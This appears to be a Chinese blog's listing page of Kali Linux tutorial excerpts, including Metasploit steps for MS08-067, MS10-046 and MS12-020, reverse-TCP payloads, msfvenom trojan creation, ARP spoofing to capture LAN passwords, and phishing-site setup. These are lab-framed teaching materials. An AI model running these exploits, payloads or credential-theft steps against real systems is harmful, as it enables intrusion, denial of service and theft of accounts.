网络安全
文章平均质量分 65
Kali与编程~
老师: ihaha12
专注Kali,禁止废话,只讲干货!
更新时间: 每周二、周四、周六
提前关注,不迷路!
展开
-
这是 Linux 的常用命令。。。
chmod:改变文件权限。mkdir:创建新目录。touch:创建新文件。rmdir:删除目录。man:查看命令手册。pwd:查看当前目录。原创 2023-02-16 22:30:09 · 98 阅读 · 0 评论 -
这是Metasploit常用命令。。。
12、banner:显示Metasploit的横幅信息。5、show:显示已设置的漏洞利用模块的参数或信息。13、quit或exit:退出Metasploit。7、exploit:使用漏洞利用模块攻击目标。8、sessions:显示所有当前活动的会话。1、help:显示所有可用命令的帮助信息。2、search:搜索可用的漏洞利用模块。3、use:选择要使用的漏洞利用模块。6、run:运行已设置的漏洞利用模块。4、set:设置漏洞利用模块的参数。11、route:设置或显示路由器。原创 2023-02-16 22:28:09 · 914 阅读 · 0 评论 -
这是nmap常用的命令列表。。。
nmap -A:全面扫描,包含操作系统和服务版本探测等。nmap -sT:TCP connect 扫描。nmap -oN:以一般文本格式输出扫描结果。nmap -oX:以XML格式输出扫描结果。nmap -sS:TCP SYN 扫描。nmap -T:指定扫描速度等级。nmap -vv:显示更详细信息。nmap -sP:扫描主机列表。nmap -sU:UDP 扫描。nmap -O:操作系统探测。nmap -p:指定端口扫描。nmap -v:显示详细信息。nmap -sV:版本扫描。原创 2023-02-16 22:13:53 · 1427 阅读 · 0 评论 -
你可以这样进阶成为Python大拿。。。
要成为Python大神,需要掌握Python编程语言的基本语法和概念,理解面向对象编程思想,了解Python标准库及其常用模块,熟练使用Python编写程序解决实际问题。Python拥有丰富的第三方库和框架,例如NumPy、Pandas、Django等,学习这些库和框架可以提高Python应用开发的能力。首先要了解Python的基本语法和控制结构,理解变量、数据类型、函数和模块等概念,以及常见的Python内置函数和异常处理。总之,成为Python大神需要不断学习和实践,并积累经验和技能。原创 2023-02-16 22:12:41 · 131 阅读 · 0 评论 -
Kali与编程:安装好KALI系统后,如何快速做好Kali Linux系统备份?
1、系统出现故障时,重新安装是很耗时的,此时做系统备份是很有必要的,当出现故障时,我们可以重新回滚到正常状态,无需重新安装,方便又省时。虚拟机良心地给我们提供快照和克隆两种系统备份方法。2、快照【开机状态下操作】(1)虚拟机–快照–拍摄快照(2)给快照取名(3)关注左下角进度条,达到100%即完成(4)进入快照管理器,使用快照3、克隆【关机状态下操作】(1)虚拟机–管理–克隆(2)默认操作(3)生成了一个一模一样的Kali克隆,如果原有Kali坏了,我们直接打开克隆机器就可正常使用!点我学习原创 2022-06-08 21:15:28 · 807 阅读 · 0 评论 -
网络安全与网站安全与计算机安全:如何远控Windows计算机操作系统并实现上传和下载文件
一、背景介绍在我们日常使用Kali Linux时,我们通常在进行安全演练的时候,当我们拿下Windows靶机(例如利用永恒之蓝拿下Win7主机)后在命令行模式下如何进行文件下载以及文件上传呢?如何解决上述问题呢?接下来让我们一起学习!二、资源装备1.安装好Kali Linux的虚拟机一台;2.已经被控制的Windows主机一个;3.整装待发的小白一个。三、战略安排3.1查看kali虚拟机sessions状况,如下图所示。命令:sessions3.2执行被控主机上的ploit文件,如下图所原创 2022-01-13 22:04:39 · 2787 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何使用Kali Linux进行内网或局域网安全演练?
本节课你将了解到如何使用ARP欺骗窃取局域网用户相关账户密玛,内容包括:1、如何开启IP转发2、怎样窃取受害用户相关账号密玛一、如何开启IP转发在之前的截取受害者电脑图片流量的课程中,我们也讲过了要开启IP转发以及如何开启,开启IP转发使受害者电脑能够正常联网,不至于打草惊蛇,方便我们后续的攻机,这里我们在重述一下如何开启IP转发。在kali机终端中输入cat /proc/sys/net/ipv4/ip_forward,查看ip_forward的值,cat命令是Linux中用于连接文件并打印到标准原创 2022-01-11 18:48:54 · 4070 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何使用Kali Linux的Nmap探测目标计算机端口状态
一、背景介绍Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端口。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。通常我们在进行渗透测试的过程中需要对目标主机的端口开放状态进行探测,从而了解目标主机,进行对应的测试。二、资源装备1.安装好Kali Linux的虚拟机一台;2.整装待发的小白一个。三、战略安排3.1 nmap基本语法使用查看,如下图所示。命令:nma原创 2021-12-26 18:19:31 · 499 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何用Kali Linux的Nmap探测计算机操作系统类型
一、背景介绍Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,nmap 也是不少网络安全工程师爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是控制者会利用nmap来搜集目标电脑的网络设定,从而计划测试的方法。Nmap 常被跟评估系统安全软件Nessus 混为一谈原创 2021-12-25 12:32:24 · 2073 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何通过Kali Linux设置一个钓鱼安全测试网站?
一、背景介绍钓鱼网站是指欺骗用户的虚假网站。“钓鱼网站”的页面与真实网站界面基本一致,欺骗消费者或者窃取访问者提交的账号和密吗信息。钓鱼网站一般只有一个或几个页面,和真实网站差别细微。钓鱼网站是互联网中最常碰到的一种诈骗方式,通常伪装成银行及电子商务、窃取用户提交的银行账号、密吗等私密信息的网站,可用电脑管家进行查杀资源装备。那么如何部署属于自己的钓鱼网站呢?接下来让我么一起学习!二、资源装备1.控制方Kali Linux主机一台;2.受害者主机一台;3.整装待发的小白一个。三、安全演练3.原创 2021-12-22 19:48:29 · 2361 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何使用Kali Linux获取WEB网站服务器操作权限的【下】
一、背景介绍Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习!二、资源装备1.安装好 Linux的虚拟机一台2.整装待发的小白一个。3.安装好的Kali Linux虚拟机一台。三、安全实战3.原创 2021-12-20 19:37:07 · 544 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何使用Kali Linux获取WEB网站服务器操作权限的【中】
一、背景介绍Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习!二、资源装备1.安装好的Linux虚拟机一台2.整装待发的小白一个。3.安装好的Kali Linux虚拟机一台。三、安全演练3.原创 2021-12-17 19:19:57 · 3662 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何使用Kali Linux获取WEB网站服务器操作权限的【上】
一、背景介绍Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习!二、资源装备1.安装好 Win7的虚拟机一台2.整装待发的小白一个。3.安装好的Kali Linux虚拟机一台。三、安全演练3.原创 2021-12-16 20:09:13 · 855 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何使用Kali Linux获取Windows计算机操作系统管理员权限【实战】
一、背景介绍Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习!二、资源装备1.安装好 Win7的虚拟机一台2.整装待发的小白一个。3.安装好的Kali Linux虚拟机一台。三、安全演练3.1原创 2021-12-13 20:14:12 · 561 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何下载到各版本Kali Linux计算机操作系统
1、Kali Linux2021.2下载http://old.kali.org/kali-images/kali-2021.2/kali-linux-2021.2-installer-amd64.iso2、Kali Linux2021.1下载http://old.kali.org/kali-images/kali-2021.1/kali-linux-2021.1-installer-amd64.iso3、Kali Linux2020.4下载http://old.kali.org/kali-imag原创 2021-12-12 20:10:08 · 2120 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何使用Kali Linux进行Windows计算机操作系统安全演练
一、课前声明1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali与编程,学习更多网络技术干货!二、资源装备1.安装好 Win7的虚拟机一台2.整装待发的小白一个。3.安装好的Kali Linux虚拟机一台。三、战略安排3.1 将受害者主机(Windows7)跟主机(Kali Linux)的网络模式全部设置为NAT模式,如下图所示。步骤:打开虚拟机的设置/选择网络适配器/选择NAT模式。3.2 利用kali linux的相关工具(msfvenom)生成对应的木码文件,如下图所示原创 2021-12-11 19:40:22 · 1290 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何使用Kali Linux的MSF进行MS12-020安全演练
一、资源装备安装好Kali Linux的虚拟机一台;Windows xp 计算机一台。二、安全演练2.1 在kali中启动MSF。打开终端 键入命令:msfconsole2.2 配置相关参数①键入命令:search ms12-020②复制msf返回的命令前加use: use auxiliary/dos/windows/rdp/ms12_020_maxchannellid③显示需要配置的参数 : show options⑤设置靶机(win xp)IP地址 set rhosts 19原创 2021-12-11 19:11:17 · 1430 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何利用Kali Linux的MSF进行MS10-046安全演练
一、资源装备安装好Kali Linux的虚拟机一台;Windows xp 计算机一台。整装待发的小白一个。二、复现步骤2.1 在kali中启动MSF。打开终端 键入命令:msfconsole2.2 配置相关参数①键入命令:search ms10-046②复制msf返回的命令前加use: use exploit/windows/browser/ms10-046_shortcut_icon_dllloader③设置payload:set paylodadwindows/meter原创 2021-12-11 18:04:01 · 290 阅读 · 0 评论 -
网络安全与网站安全及计算机安全:如何使用Kali Linux进行MS08-067安全演练
一、资源装备安装好Kali Linux的虚拟机一台;Windows xp 计算机一台。二、安全演练2.1 在kali中启动MSF。打开终端 键入命令:msfconsole2.2 配置相关参数①键入命令:search ms08-067②复制msf返回的命令前加use: use exploit/windows/ms08-067 netapi③设置payload:set paylodadwindows/shell/revers tcp④显示需要配置的参数 : show options原创 2021-12-11 17:45:45 · 585 阅读 · 0 评论